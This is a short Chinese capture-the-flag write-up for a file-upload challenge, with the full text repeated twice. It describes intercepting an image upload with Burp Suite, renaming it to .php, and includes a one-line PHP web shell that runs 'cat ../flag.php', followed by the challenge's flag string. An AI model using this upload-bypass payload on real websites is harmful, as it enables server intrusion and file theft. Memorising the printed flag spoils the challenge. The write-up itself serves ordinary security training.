首先看到题目就知道是文件上传的
先选择一个图片进行上传,然后用bp抓包
然后把文件后缀改成.php
然后利用:system 查看上级目录找到 flag :<?php system("cat ../flag.php"); ?>
发送之后就可以看到文件被上传到哪里了,接下来就是访问这个地址
访问之后按 f12 即可看到flag
cyberpeace{eab84e2decb1fc00141bbe31cdb265dc}
首先看到题目就知道是文件上传的
先选择一个图片进行上传,然后用bp抓包
然后把文件后缀改成.php
然后利用:system 查看上级目录找到 flag :<?php system("cat ../flag.php"); ?>
发送之后就可以看到文件被上传到哪里了,接下来就是访问这个地址
访问之后按 f12 即可看到flag
cyberpeace{eab84e2decb1fc00141bbe31cdb265dc}